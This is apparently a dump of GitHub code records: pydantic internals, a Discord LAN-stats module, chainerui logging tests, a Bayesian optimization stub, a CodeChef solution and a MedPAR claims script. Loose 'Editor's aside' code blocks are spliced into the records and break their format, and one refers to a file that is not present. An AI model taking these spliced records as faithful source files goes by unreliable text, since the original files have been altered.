\"public/results.html\", form=form, domain=domain, asin=asin, range=range\n )\n\n\n@blueprint.route(\"/about/\")\ndef about():\n \"\"\"About page.\"\"\"\n return render_template(\"public/about.html\")\n\n\n@blueprint.route(\"/favicon.ico\")\ndef favicon():\n return send_from_directory(\"./static/build/img\", 
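# --- Editor's aside (hedged sketch): multiply() in fastmultiply.py above
# recurses into FOUR half-size products, which is plain divide-and-conquer;
# Karatsuba proper needs only THREE. A minimal integer version for comparison:
def karatsuba(x, y):
    if x < 10 or y < 10:
        return x * y
    half = max(len(str(x)), len(str(y))) // 2
    a, b = divmod(x, 10 ** half)              # x = a*10^half + b
    c, d = divmod(y, 10 ** half)              # y = c*10^half + d
    ac = karatsuba(a, c)
    bd = karatsuba(b, d)
    mid = karatsuba(a + b, c + d) - ac - bd   # equals ad + bc, one multiply saved
    return ac * 10 ** (2 * half) + mid * 10 ** half + bd

# karatsuba(1234, 9876) == 1234 * 9876 == 12186984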
\"favicon.ico\")\n","repo_name":"weizihua/BuyHistory","sub_path":"buyhistory/public/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17729906913","text":"from __future__ import annotations\n\nfrom collections import defaultdict\nfrom copy import copy\nfrom functools import partial\nfrom typing import TYPE_CHECKING, Any, Callable, Iterable\n\nfrom pydantic_core import CoreSchema, PydanticCustomError, to_jsonable_python\nfrom pydantic_core import core_schema as cs\n\nfrom ._fields import PydanticMetadata\n\nif TYPE_CHECKING:\n from ..annotated_handlers import GetJsonSchemaHandler\n\n\nSTRICT = {'strict'}\nSEQUENCE_CONSTRAINTS = {'min_length', 'max_length'}\nINEQUALITY = {'le', 'ge', 'lt', 'gt'}\nNUMERIC_CONSTRAINTS = {'multiple_of', 'allow_inf_nan', *INEQUALITY}\n\nSTR_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT, 'strip_whitespace', 'to_lower', 'to_upper', 'pattern'}\nBYTES_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\n\nLIST_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\nTUPLE_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\nSET_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\nDICT_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\nGENERATOR_CONSTRAINTS = {*SEQUENCE_CONSTRAINTS, *STRICT}\n\nFLOAT_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nINT_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nBOOL_CONSTRAINTS = STRICT\nUUID_CONSTRAINTS = STRICT\n\nDATE_TIME_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nTIMEDELTA_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nTIME_CONSTRAINTS = {*NUMERIC_CONSTRAINTS, *STRICT}\nLAX_OR_STRICT_CONSTRAINTS = STRICT\n\nUNION_CONSTRAINTS = {'union_mode'}\nURL_CONSTRAINTS = {\n 'max_length',\n 'allowed_schemes',\n 'host_required',\n 'default_host',\n 'default_port',\n 'default_path',\n}\n\nTEXT_SCHEMA_TYPES = ('str', 'bytes', 'url', 'multi-host-url')\nSEQUENCE_SCHEMA_TYPES = ('list', 'tuple', 'set', 'frozenset', 'generator', *TEXT_SCHEMA_TYPES)\nNUMERIC_SCHEMA_TYPES = ('float', 'int', 'date', 'time', 'timedelta', 'datetime')\n\nCONSTRAINTS_TO_ALLOWED_SCHEMAS: dict[str, set[str]] = defaultdict(set)\nfor constraint in STR_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(TEXT_SCHEMA_TYPES)\nfor constraint in BYTES_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('bytes',))\nfor constraint in LIST_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('list',))\nfor constraint in TUPLE_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('tuple',))\nfor constraint in SET_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('set', 'frozenset'))\nfor constraint in DICT_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('dict',))\nfor constraint in GENERATOR_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('generator',))\nfor constraint in FLOAT_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('float',))\nfor constraint in INT_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('int',))\nfor constraint in DATE_TIME_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('date', 'time', 'datetime'))\nfor constraint in TIMEDELTA_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('timedelta',))\nfor constraint in TIME_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('time',))\nfor schema_type in (*TEXT_SCHEMA_TYPES, *SEQUENCE_SCHEMA_TYPES, *NUMERIC_SCHEMA_TYPES, 
'typed-dict', 'model'):\n CONSTRAINTS_TO_ALLOWED_SCHEMAS['strict'].add(schema_type)\nfor constraint in UNION_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('union',))\nfor constraint in URL_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('url', 'multi-host-url'))\nfor constraint in BOOL_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('bool',))\nfor constraint in UUID_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('uuid',))\nfor constraint in LAX_OR_STRICT_CONSTRAINTS:\n CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint].update(('lax-or-strict',))\n\n\ndef add_js_update_schema(s: cs.CoreSchema, f: Callable[[], dict[str, Any]]) -> None:\n def update_js_schema(s: cs.CoreSchema, handler: GetJsonSchemaHandler) -> dict[str, Any]:\n js_schema = handler(s)\n js_schema.update(f())\n return js_schema\n\n if 'metadata' in s:\n metadata = s['metadata']\n if 'pydantic_js_functions' in s:\n metadata['pydantic_js_functions'].append(update_js_schema)\n else:\n metadata['pydantic_js_functions'] = [update_js_schema]\n else:\n s['metadata'] = {'pydantic_js_functions': [update_js_schema]}\n\n\ndef as_jsonable_value(v: Any) -> Any:\n if type(v) not in (int, str, float, bytes, bool, type(None)):\n return to_jsonable_python(v)\n return v\n\n\ndef expand_grouped_metadata(annotations: Iterable[Any]) -> Iterable[Any]:\n \"\"\"Expand the annotations.\n\n Args:\n annotations: An iterable of annotations.\n\n Returns:\n An iterable of expanded annotations.\n\n Example:\n ```py\n from annotated_types import Ge, Len\n\n from pydantic._internal._known_annotated_metadata import expand_grouped_metadata\n\n print(list(expand_grouped_metadata([Ge(4), Len(5)])))\n #> [Ge(ge=4), MinLen(min_length=5)]\n ```\n \"\"\"\n import annotated_types as at\n\n from pydantic.fields import FieldInfo # circular import\n\n for annotation in annotations:\n if isinstance(annotation, at.GroupedMetadata):\n yield from annotation\n elif isinstance(annotation, FieldInfo):\n yield from annotation.metadata\n # this is a bit problematic in that it results in duplicate metadata\n # all of our \"consumers\" can handle it, but it is not ideal\n # we probably should split up FieldInfo into:\n # - annotated types metadata\n # - individual metadata known only to Pydantic\n annotation = copy(annotation)\n annotation.metadata = []\n yield annotation\n else:\n yield annotation\n\n\ndef apply_known_metadata(annotation: Any, schema: CoreSchema) -> CoreSchema | None: # noqa: C901\n \"\"\"Apply `annotation` to `schema` if it is an annotation we know about (Gt, Le, etc.).\n Otherwise return `None`.\n\n This does not handle all known annotations. If / when it does, it can always\n return a CoreSchema and return the unmodified schema if the annotation should be ignored.\n\n Assumes that GroupedMetadata has already been expanded via `expand_grouped_metadata`.\n\n Args:\n annotation: The annotation.\n schema: The schema.\n\n Returns:\n An updated schema with annotation if it is an annotation we know about, `None` otherwise.\n\n Raises:\n PydanticCustomError: If `Predicate` fails.\n \"\"\"\n import annotated_types as at\n\n from . 
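# --- Editor's aside (hedged sketch): the allowed-schema tables above are what
# ultimately back constraints users attach with typing.Annotated; a small
# end-to-end illustration using the public pydantic v2 API:
from typing import Annotated
from annotated_types import Gt, MaxLen
from pydantic import BaseModel, ValidationError

class Item(BaseModel):
    count: Annotated[int, Gt(0)]      # 'gt' is allowed for 'int' schemas
    name: Annotated[str, MaxLen(8)]   # 'max_length' is allowed for 'str'

try:
    Item(count=0, name='far too long a name')
except ValidationError as exc:
    print(exc)  # reports both constraint violations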
import _validators\n\n schema = schema.copy()\n schema_update, other_metadata = collect_known_metadata([annotation])\n schema_type = schema['type']\n for constraint, value in schema_update.items():\n if constraint not in CONSTRAINTS_TO_ALLOWED_SCHEMAS:\n raise ValueError(f'Unknown constraint {constraint}')\n allowed_schemas = CONSTRAINTS_TO_ALLOWED_SCHEMAS[constraint]\n\n if schema_type in allowed_schemas:\n if constraint == 'union_mode' and schema_type == 'union':\n schema['mode'] = value # type: ignore # schema is UnionSchema\n else:\n schema[constraint] = value\n continue\n\n if constraint == 'allow_inf_nan' and value is False:\n return cs.no_info_after_validator_function(\n _validators.forbid_inf_nan_check,\n schema,\n )\n elif constraint == 'pattern':\n # insert a str schema to make sure the regex engine matches\n return cs.chain_schema(\n [\n schema,\n cs.str_schema(pattern=value),\n ]\n )\n elif constraint == 'gt':\n s = cs.no_info_after_validator_function(\n partial(_validators.greater_than_validator, gt=value),\n schema,\n )\n add_js_update_schema(s, lambda: {'gt': as_jsonable_value(value)})\n return s\n elif constraint == 'ge':\n return cs.no_info_after_validator_function(\n partial(_validators.greater_than_or_equal_validator, ge=value),\n schema,\n )\n elif constraint == 'lt':\n return cs.no_info_after_validator_function(\n partial(_validators.less_than_validator, lt=value),\n schema,\n )\n elif constraint == 'le':\n return cs.no_info_after_validator_function(\n partial(_validators.less_than_or_equal_validator, le=value),\n schema,\n )\n elif constraint == 'multiple_of':\n return cs.no_info_after_validator_function(\n partial(_validators.multiple_of_validator, multiple_of=value),\n schema,\n )\n elif constraint == 'min_length':\n s = cs.no_info_after_validator_function(\n partial(_validators.min_length_validator, min_length=value),\n schema,\n )\n add_js_update_schema(s, lambda: {'minLength': (as_jsonable_value(value))})\n return s\n elif constraint == 'max_length':\n s = cs.no_info_after_validator_function(\n partial(_validators.max_length_validator, max_length=value),\n schema,\n )\n add_js_update_schema(s, lambda: {'maxLength': (as_jsonable_value(value))})\n return s\n elif constraint == 'strip_whitespace':\n return cs.chain_schema(\n [\n schema,\n cs.str_schema(strip_whitespace=True),\n ]\n )\n elif constraint == 'to_lower':\n return cs.chain_schema(\n [\n schema,\n cs.str_schema(to_lower=True),\n ]\n )\n elif constraint == 'to_upper':\n return cs.chain_schema(\n [\n schema,\n cs.str_schema(to_upper=True),\n ]\n )\n elif constraint == 'min_length':\n return cs.no_info_after_validator_function(\n partial(_validators.min_length_validator, min_length=annotation.min_length),\n schema,\n )\n elif constraint == 'max_length':\n return cs.no_info_after_validator_function(\n partial(_validators.max_length_validator, max_length=annotation.max_length),\n schema,\n )\n else:\n raise RuntimeError(f'Unable to apply constraint {constraint} to schema {schema_type}')\n\n for annotation in other_metadata:\n if isinstance(annotation, at.Gt):\n return cs.no_info_after_validator_function(\n partial(_validators.greater_than_validator, gt=annotation.gt),\n schema,\n )\n elif isinstance(annotation, at.Ge):\n return cs.no_info_after_validator_function(\n partial(_validators.greater_than_or_equal_validator, ge=annotation.ge),\n schema,\n )\n elif isinstance(annotation, at.Lt):\n return cs.no_info_after_validator_function(\n partial(_validators.less_than_validator, lt=annotation.lt),\n schema,\n )\n 
elif isinstance(annotation, at.Le):\n return cs.no_info_after_validator_function(\n partial(_validators.less_than_or_equal_validator, le=annotation.le),\n schema,\n )\n elif isinstance(annotation, at.MultipleOf):\n return cs.no_info_after_validator_function(\n partial(_validators.multiple_of_validator, multiple_of=annotation.multiple_of),\n schema,\n )\n elif isinstance(annotation, at.MinLen):\n return cs.no_info_after_validator_function(\n partial(_validators.min_length_validator, min_length=annotation.min_length),\n schema,\n )\n elif isinstance(annotation, at.MaxLen):\n return cs.no_info_after_validator_function(\n partial(_validators.max_length_validator, max_length=annotation.max_length),\n schema,\n )\n elif isinstance(annotation, at.Predicate):\n predicate_name = f'{annotation.func.__qualname__} ' if hasattr(annotation.func, '__qualname__') else ''\n\n def val_func(v: Any) -> Any:\n # annotation.func may also raise an exception, let it pass through\n if not annotation.func(v):\n raise PydanticCustomError(\n 'predicate_failed',\n f'Predicate {predicate_name}failed', # type: ignore\n )\n return v\n\n return cs.no_info_after_validator_function(val_func, schema)\n # ignore any other unknown metadata\n return None\n\n return schema\n\n\ndef collect_known_metadata(annotations: Iterable[Any]) -> tuple[dict[str, Any], list[Any]]:\n \"\"\"Split `annotations` into known metadata and unknown annotations.\n\n Args:\n annotations: An iterable of annotations.\n\n Returns:\n A tuple contains a dict of known metadata and a list of unknown annotations.\n\n Example:\n ```py\n from annotated_types import Gt, Len\n\n from pydantic._internal._known_annotated_metadata import collect_known_metadata\n\n print(collect_known_metadata([Gt(1), Len(42), ...]))\n #> ({'gt': 1, 'min_length': 42}, [Ellipsis])\n ```\n \"\"\"\n import annotated_types as at\n\n annotations = expand_grouped_metadata(annotations)\n\n res: dict[str, Any] = {}\n remaining: list[Any] = []\n for annotation in annotations:\n # isinstance(annotation, PydanticMetadata) also covers ._fields:_PydanticGeneralMetadata\n if isinstance(annotation, PydanticMetadata):\n res.update(annotation.__dict__)\n # we don't use dataclasses.asdict because that recursively calls asdict on the field values\n elif isinstance(annotation, at.MinLen):\n res.update({'min_length': annotation.min_length})\n elif isinstance(annotation, at.MaxLen):\n res.update({'max_length': annotation.max_length})\n elif isinstance(annotation, at.Gt):\n res.update({'gt': annotation.gt})\n elif isinstance(annotation, at.Ge):\n res.update({'ge': annotation.ge})\n elif isinstance(annotation, at.Lt):\n res.update({'lt': annotation.lt})\n elif isinstance(annotation, at.Le):\n res.update({'le': annotation.le})\n elif isinstance(annotation, at.MultipleOf):\n res.update({'multiple_of': annotation.multiple_of})\n elif isinstance(annotation, type) and issubclass(annotation, PydanticMetadata):\n # also support PydanticMetadata classes being used without initialisation,\n # e.g. 
`Annotated[int, Strict]` as well as `Annotated[int, Strict()]`\n res.update({k: v for k, v in vars(annotation).items() if not k.startswith('_')})\n else:\n remaining.append(annotation)\n # Nones can sneak in but pydantic-core will reject them\n # it'd be nice to clean things up so we don't put in None (we probably don't _need_ to, it was just easier)\n # but this is simple enough to kick that can down the road\n res = {k: v for k, v in res.items() if v is not None}\n return res, remaining\n\n\ndef check_metadata(metadata: dict[str, Any], allowed: Iterable[str], source_type: Any) -> None:\n \"\"\"A small utility function to validate that the given metadata can be applied to the target.\n More than saving lines of code, this gives us a consistent error message for all of our internal implementations.\n\n Args:\n metadata: A dict of metadata.\n allowed: An iterable of allowed metadata.\n source_type: The source type.\n\n Raises:\n TypeError: If there is metadatas that can't be applied on source type.\n \"\"\"\n unknown = metadata.keys() - set(allowed)\n if unknown:\n raise TypeError(\n f'The following constraints cannot be applied to {source_type!r}: {\", \".join([f\"{k!r}\" for k in unknown])}'\n )\n","repo_name":"pydantic/pydantic","sub_path":"pydantic/_internal/_known_annotated_metadata.py","file_name":"_known_annotated_metadata.py","file_ext":"py","file_size_in_byte":16415,"program_lang":"python","lang":"en","doc_type":"code","stars":16514,"dataset":"github-code","pt":"48"} +{"seq_id":"15440278445","text":"from datetime import datetime\n\nTESTING = False\n\nclass LANInfo:\n def __init__(self, start_time, end_time, participants, guild_id):\n self.start_time = start_time\n self.end_time = end_time\n self.participants = participants\n self.guild_id = guild_id\n\nif not TESTING:\n LAN_PARTIES = {\n \"october_21\": LANInfo(\n datetime(2021, 10, 30, 14, 0, 0).timestamp(),\n datetime(2021, 10, 31, 12, 0, 0).timestamp(),\n {\n 115142485579137029: \"Dave\",\n 172757468814770176: \"Murt\",\n 267401734513491969: \"Gual\",\n 331082926475182081: \"Muds\",\n 347489125877809155: \"Nønø\"\n },\n 803987403932172359 # Core Nibs\n ),\n \"april_22\": LANInfo(\n datetime(2022, 4, 15, 14, 0, 0).timestamp(),\n datetime(2022, 4, 16, 12, 0, 0).timestamp(),\n {\n 115142485579137029: \"Dave\",\n 172757468814770176: \"Murt\",\n 267401734513491969: \"Gual\",\n 331082926475182081: \"Muds\",\n 347489125877809155: \"Nønø\"\n },\n 803987403932172359 # Core Nibs\n ),\n \"september_23\": LANInfo(\n datetime(2023, 9, 9, 14, 0, 0).timestamp(),\n datetime(2023, 9, 10, 12, 0, 0).timestamp(),\n {\n 115142485579137029: \"Dave\",\n 172757468814770176: \"Murt\",\n 267401734513491969: \"Gual\",\n 331082926475182081: \"Muds\",\n 347489125877809155: \"Nønø\"\n },\n 803987403932172359 # Core Nibs\n )\n }\nelse: # Use old data for testing.\n LAN_PARTIES = {\n \"april_22\": LANInfo(\n 1631470327,\n 1631655446,\n {\n 115142485579137029: \"Dave\",\n 172757468814770176: \"Murt\",\n 267401734513491969: \"Gual\",\n 331082926475182081: \"Muds\",\n 347489125877809155: \"Nønø\"\n },\n 619073595561213953 # League Nibs\n )\n }\n\ndef is_lan_ongoing(timestamp, guild_id=None):\n lan_date = list(filter(\n lambda x: timestamp > LAN_PARTIES[x].start_time and timestamp < LAN_PARTIES[x].end_time,\n LAN_PARTIES\n ))\n\n if lan_date == []:\n return False\n\n latest_lan_info = LAN_PARTIES[lan_date[0]]\n\n # Check if guild_id matches, if given.\n return guild_id is None or guild_id == latest_lan_info.guild_id\n\ndef get_tilt_value(recent_games):\n # Tilt 
value ranges from 0-12\n tilt_value = 0\n max_value = 12\n max_contribution = 4\n min_contribution = 1\n win_contribution = 0.75\n prev_result = 0\n streak = 1\n for index, result in enumerate(recent_games):\n tilt_contribution = max(max_contribution - index, min_contribution)\n if index > 0:\n if prev_result == result:\n streak += 1\n else:\n streak = 1\n\n tilt_contribution *= (streak // 2)\n\n if result == 1:\n tilt_contribution *= -win_contribution\n\n tilt_value += tilt_contribution\n\n prev_result = result\n\n # Clamp value to between 0-12\n tilt_value = max(min(tilt_value, max_value), 0)\n\n colors = [\n \"rgb(124, 252, 0)\", \"rgb(156, 252, 0)\", \"rgb(188, 253, 0)\",\n \"rgb(220, 253, 0)\", \"rgb(252, 253, 0)\", \"rgb(252, 223, 0)\",\n \"rgb(253, 191, 0)\", \"rgb(254, 159, 0)\", \"rgb(254, 128, 0)\",\n \"rgb(254, 96, 0)\", \"rgb(254, 64, 0)\", \"rgb(255, 0, 0)\"\n ]\n color = colors[min(round(tilt_value), 11)]\n\n # Convert to percent.\n return int((tilt_value / max_value) * 100), color\n\ndef get_average_stats(database, lan_info):\n all_stats = database.get_league_lan_stats(\n time_after=lan_info.start_time,\n time_before=lan_info.end_time,\n guild_id=lan_info.guild_id\n )\n\n if all_stats == []:\n return None, None\n\n keys = [\n \"Kills\", \"Deaths\", \"KDA\", \"CS\", \"CS/min\", \"Damage\",\n \"Gold\", \"KP\", \"Vision Wards\", \"Vision Score\"\n ]\n\n all_avg_stats = {key: [] for key in keys}\n for disc_id in all_stats:\n avg_stats = [0 for _ in keys]\n total_kda = 0\n\n for stat_tuple in all_stats[disc_id]:\n total_kda += (stat_tuple[0] + stat_tuple[2]) / stat_tuple[1]\n for index, stat_value in enumerate(stat_tuple):\n avg_stats[index] += stat_value\n avg_stats[2] = total_kda\n\n for index, sum_value in enumerate(avg_stats):\n all_avg_stats[keys[index]].append((disc_id, sum_value / len(all_stats[disc_id])))\n\n for key in all_avg_stats:\n reverse = False if key == \"Deaths\" else True\n all_avg_stats[key].sort(key=lambda x: x[1], reverse=reverse)\n\n all_ranks = {}\n\n for stat_name in all_avg_stats:\n stats = all_avg_stats[stat_name]\n\n for index, (disc_id, _) in enumerate(stats):\n all_ranks[disc_id] = all_ranks.get(disc_id, 0) + (index + 1)\n\n all_ranks_list = [(k, v) for k, v in all_ranks.items()]\n all_ranks_list.sort(key=lambda x: x[1])\n\n return all_avg_stats, all_ranks_list\n","repo_name":"mhso/IntFar","sub_path":"api/lan.py","file_name":"lan.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"27137743302","text":"from chainerui.logging import _get_library_logger\nfrom chainerui.logging import get_logger\n\n\ndef test_get_logger_with_pytest_default(caplog):\n # On flask 0.12.x, when remove flask's handler, local handler is also\n # no effect (not known exactly why?). Need to set caplog handler again.\n _get_library_logger().addHandler(caplog.handler)\n # caplog has already set on start unittest module\n import logging\n assert logging.getLogger().handlers\n\n # other test suite has already called chainerui.logger, so need to reset\n # library logger\n import chainerui.logging as logging_util\n logging_util._logger = None\n logger = get_logger()\n\n # When added caplog handler manually, caplog captures logging 2 times,\n # on root logger and on local logger. 
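# --- Editor's aside (hedged reading of get_tilt_value above): recent_games is
# ordered most-recent-first with 1 = win and 0 = loss; newer games weigh more
# (max_contribution - index), streaks scale the contribution via streak // 2,
# wins pull tilt down at 75% strength, and the total is clamped to 0..12 before
# being reported as a percent plus an rgb() color string. Illustrative call:
# pct, color = get_tilt_value([0, 0, 0, 1, 1])  # recent losing streak -> elevated tilt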
To prevent from this issue,\n # remove root handler manually after get local logger.\n root_logger = logging.getLogger()\n if root_logger.handlers:\n for handler in root_logger.handlers[:]:\n root_logger.removeHandler(handler)\n\n logger.error('error')\n logger.info('info')\n logger.debug('debug')\n\n assert len(caplog.records) == 2\n assert 'event' in caplog.records[0].message\n assert \"error\" in caplog.records[0].message\n assert 'event' in caplog.records[1].message\n assert 'info' in caplog.records[1].message\n\n logging_util.set_loglevel(logging.DEBUG)\n logger2 = get_logger()\n logger2.debug('debug')\n assert len(caplog.records) == 3\n assert 'event' in caplog.records[2].message\n assert 'debug' in caplog.records[2].message\n\n\ndef test_get_logger_with_own_handler(capsys):\n # reset pytest logging capture\n import logging\n root_logger = logging.getLogger()\n if root_logger.handlers:\n for handler in root_logger.handlers[:]:\n root_logger.removeHandler(handler)\n\n # other test suite has already called chainerui.logger, so need to reset\n # library logger\n import chainerui.logging as logging_util\n logging_util._logger = None\n logger = get_logger()\n\n logger.error('error')\n logger.info('info')\n logger.debug('debug')\n\n _, err = capsys.readouterr()\n assert 'event' not in err\n assert 'error' in err\n assert 'info' in err\n assert 'debug' not in err\n\n logging_util.set_loglevel(logging.DEBUG)\n logger.debug('debug')\n _, err2 = capsys.readouterr()\n assert 'debug' in err2\n","repo_name":"chainer/chainerui","sub_path":"tests/test_logging.py","file_name":"test_logging.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"48"} +{"seq_id":"2985616028","text":"#!/usr/bin/env python3\n\n\n\"\"\"useless comment\"\"\"\n\nimport numpy as np\n\nGP = __import__('2-gp').GaussianProcess\n\n\nclass BayesianOptimization:\n \"\"\"\n Bayesian Optimization Class\n \"\"\"\n\n def __init__(\n self,\n f,\n X_init,\n Y_init,\n bounds,\n ac_samples,\n l=1,\n sigma_f=1,\n xsi=0.01,\n minimize=True,\n ):\n \"\"\"\n Init the class\n :param f: The blakc-box function\n :param X_init: The dataset inital\n :param Y_init: The value of the initial\n dataset after being process by f\n :param bounds: The bounds of the space in\n which to look for the optimal point\n :param ac_samples: The number of samples\n that should by analyzed during acquisition\n :param l: The length parameter for the kernel\n :param sigma_f: The std given to the output\n of the black_box function f\n :param xsi: The exploration-exploitation factor\n for acquisition\n :param minimize: Determining whether optimization should\n be performed for minimization or maximization\n \"\"\"\n self.f = f\n self.gp = GP(X_init, Y_init, l=l, sigma_f=sigma_f)\n self.X_s = np.linspace(\n bounds[0],\n bounds[1],\n ac_samples\n ).reshape((-1, 1))\n self.xsi = xsi\n self.minimize = minimize\n","repo_name":"Camaltra/holbertonschool-machine_learning","sub_path":"unsupervised_learning/hyperparameter_tuning/3-bayes_opt.py","file_name":"3-bayes_opt.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8691065755","text":"# cook your dish here\nfor t in range(int(input())):\n S=input()\n max_pairs=0\n prev=True\n for i in range(1,len(S)):\n if(S[i]!=S[i-1] and prev):\n prev=False\n max_pairs+=1\n else:\n prev=True\n print(max_pairs) 
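# --- Editor's aside (hedged usage sketch for the BayesianOptimization
# initializer above): the toy black-box f and the numbers are illustrative,
# and the GP class comes from the course's 2-gp module as imported above.
import numpy as np

def f(x):
    return np.sin(x)                      # toy black-box function

X_init = np.array([[1.0], [4.0]])
Y_init = f(X_init)
# bo = BayesianOptimization(f, X_init, Y_init, bounds=(0.0, 2.0 * np.pi),
#                           ac_samples=50)
# bo.X_s.shape -> (50, 1): the grid of candidate points scored during acquisition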
","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"XYSTR.py","file_name":"XYSTR.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"22395537064","text":"## THIS SCRIPT IDENTIFY UTI/PNEUMONIA IN SNF CLAIMS FROM MEDPAR\n\nimport pandas as pd\nimport dask.dataframe as dd\nimport dask\nimport numpy as np\nimport datetime\n\npd.set_option('display.max_columns', 500)\nfrom dask.distributed import Client\nclient = Client(\"10.50.86.250:56321\")\n\ndef identify_uti_claims(row):\n ## a function to identify UTI claims using diagnosis code\n ## define diagnosis code columns\n dcode = ['DGNS_{}_CD'.format(i) for i in list(range(1, 26))]\n\n uti_claims = row[dcode[2:]].isin(icd[icd['outcome']==\"uti\"]['icd']) ##determines if diagnosis code is related to uti\n\n if (any(row['DGNS_1_CD']==code for code in icd[icd['outcome'] == \"uti\"]['icd'])):\n row['claim_typeUTI'] = 'primary' ## if the first diagnosis code is related to UTI\n elif (any(row['DGNS_2_CD']==code for code in icd[icd['outcome'] == \"uti\"]['icd'])):\n row['claim_typeUTI'] = 'second' ## if the second diagnosis code is related to UTI\n elif any(uti_claims):\n row['claim_typeUTI'] = 'secondary' ## if any remaining secondary diagnosis code is related to UTI\n else:\n row['claim_typeUTI'] = 'not_uti'\n return row\n\ndef identify_pneu_claims(row):\n ## a function to identify pneumonia claims using diagnosis code\n ## define diagnosis code columns\n dcode = ['DGNS_{}_CD'.format(i) for i in list(range(1, 26))]\n\n pneumonia_claims = row[dcode[2:]].isin(icd[icd['outcome']==\"pneumonia\"]['icd']) ##determines if diagnosis code is related to pneumonia\n\n if (any(row['DGNS_1_CD']==code for code in icd[icd['outcome'] == \"pneumonia\"]['icd'])):\n row['claim_typePNEU'] = 'primary'\n elif (any(row['DGNS_2_CD']==code for code in icd[icd['outcome'] == \"pneumonia\"]['icd'])):\n row['claim_typePNEU'] = 'second'\n elif any(pneumonia_claims):\n row['claim_typePNEU'] = 'secondary'\n else:\n row['claim_typePNEU'] = 'not_pneumonia'\n\n return row\n\n\nyears = range(2011, 2018)\nclaims_type = [\"primary\", \"second\", \"secondary\"]\n\nmedparPath = \"/gpfs/data/cms-share/data/medicare/{}/medpar/parquet\"\nwritePath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/medpar/infection/constructed_data2/'\nanalysisPath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/medpar/infection/initial_analysis/'\n# ## read in icd codes for UTI and Pneumonia\nicd = pd.read_csv('/gpfs/data/cms-share/duas/55378/Zoey/gardner/gitlab_code/nhc_infections/code/initial_analysis/icd.csv')\nicd = icd.astype({'icd': 'str'})\n\nfor year in years:\n\n ## define diagnosis columns\n dcode = ['DGNS_{}_CD'.format(i) for i in list(range(1, 26))]\n ## define poa indicator columns (not used)\n poacode = ['POA_DGNS_{}_IND_CD'.format(i) for i in list(range(1, 26))]\n ## define diagnosis version columns\n dvcode = ['DGNS_VRSN_CD_{}'.format(i) for i in list(range(1, 26))]\n ## define columns selected for the analysis\n col_use = ['BENE_ID', 'MEDPAR_ID', 'MEDPAR_YR_NUM', 'PRVDR_NUM', 'ADMSN_DT', 'DSCHRG_DT',\n 'DSCHRG_DSTNTN_CD', 'SS_LS_SNF_IND_CD', 'BENE_DSCHRG_STUS_CD', 'DRG_CD',\n 'ADMTG_DGNS_CD', 'CVRD_LVL_CARE_THRU_DT'] + dcode + poacode + dvcode\n\n ## read in raw MedPAR data\n medpar = dd.read_parquet(medparPath.format(year), engine=\"fastparquet\")\n medpar = medpar.reset_index()\n\n ## select columns and rows\n ## 1) select inpatient data\n ## 2) select columns\n ## 3) 
